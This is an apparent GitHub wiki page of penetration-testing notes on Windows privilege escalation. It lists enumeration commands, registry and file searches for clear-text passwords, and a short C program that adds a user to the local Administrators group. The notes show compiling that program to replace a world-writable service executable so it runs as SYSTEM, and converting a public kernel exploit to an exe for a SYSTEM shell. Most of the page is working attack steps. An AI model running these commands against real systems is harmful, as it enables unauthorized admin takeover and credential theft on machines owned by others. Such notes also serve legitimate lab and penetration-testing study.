-
Notifications
You must be signed in to change notification settings - Fork 14
Privilege Escalation in Windows
- To get admin / root privilege in Windows
- Schedule task file is at C:\Windows\Tasks =>
icacls C:\Windows\Tasks
- GOOD REF: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#search-the-registry-for-key-names-and-passwords
- https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
- In attacker,
cd win-exp-suggester
andpython windows-exploit-suggester.py --update
- In Victim:
systeminfo
and copy to win7sp1-systeminfo.txt - In attacker,
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo ../win7sp1-systeminfo.txt
- https://guif.re/windowseop
- Windows 2000 commands: http://www.cs.toronto.edu/~simon/howto/win2kcommands.html
- Get OS: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- Get OS 32 or 64 bit: set pro <========== Frequently used.
- Get hostname: hostname
- Get username (Not working?): echo %username%
- Get all users: net users
- Get a user: net user [username]
- Get interfaces: ipconfig /all
- Get routes: route print
- Get ARP: arp -A
- Get active connection: netstat -ano
- (For WinXP SP2++) Get firewall rules: netsh firewall show state
- (For WinXP SP2++) Get firewall config: netsh firewall show config
- Get scheduled tasks: schtasks /query /fo LIST /v <================== FREQUENTLY USE
- Get processes linking to sevices: tasklist /SVC <================== FREQUENTLY USE
- Get started services: net start
- (For Win7 and 8 with normal user) Get Windows WMIC Command Line: wmic /?
- (For Win7 and 8 with normal user) Get Hotfix from WMIC: wmic qfe get Caption,Description,HotFixID,InstalledOn
- (For Win7 and 8 with normal user) Get current Patches from WMIC: wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Search these files for clear-text passwords (or search the whole OS)
- c:\sysprep.inf
- c:\sysprep\sysprep.xml
- %WINDIR%\Panther\Unattend\Unattended.xml
- %WINDIR%\Panther\Unattended.xml
Search for passwords
- Search for filenames:
dir /s *pass* == *cred* == *vnc* == *.config*
- Search for keywords in files:
findstr /si password *.xml *.ini *.txt
- Search for keywords in registry HKLM :
reg query HKLM /f password /t REG_SZ /s
- Search for keywords in registry HKCU:
reg query HKCU /f password /t REG_SZ /s
Check scheduled tasks and running processes and get related executing files.
- icacls C:\Windows\Tasks
- Get scheduled tasks: schtasks /query /fo LIST /v <================== FREQUENTLY USE
- Get processes linking to sevices: tasklist /SVC <================== FREQUENTLY USE
Check the file permission executing files. Look for EVERYONE - Full permission
-
WinXP and lower: use cacls
-
New Windows: Use icacls.
-
c:\Program Files\Photodex\ProShow Producer>icacls scsiaccess.exe
-
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
-
BUILTIN\Administrators:(I)(F)
-
BUILTIN\Users:(I)(RX)
-
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
-
Everyone:(I)(F)
Create a useradd program to add a user "low" to Administrators
root@kali:~# cat useradd.c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators low /add");
return 0;
}
Compile useradd.c to unsecure permission file to run in Windows
- Windows 64-bit target: root@kali:~# i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
- Windows 32-bit target: i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c -lws2_32
Replace the original scsiaccess.exe with evil scsiaccess.exe
Wail for scsiaccess.exe to be executed.
Check https://www.exploit-db.com. Normally the scripts are in python.
- Eg.: Windows 7 Sp1 escalation
OR Scan for vulnerable exploits with nmap
nmap --script exploit -Pn $ip
In Windows, convert python file to Windows exe
python pyinstaller.py --onefile ms11-080.py
OR in Linux, convert python file to Windows exe
Copy the above exe to victim machine.
Execute the exe as low priviledged user to get SYSTEM shell.
Add new admin user
net user newuser newpass /add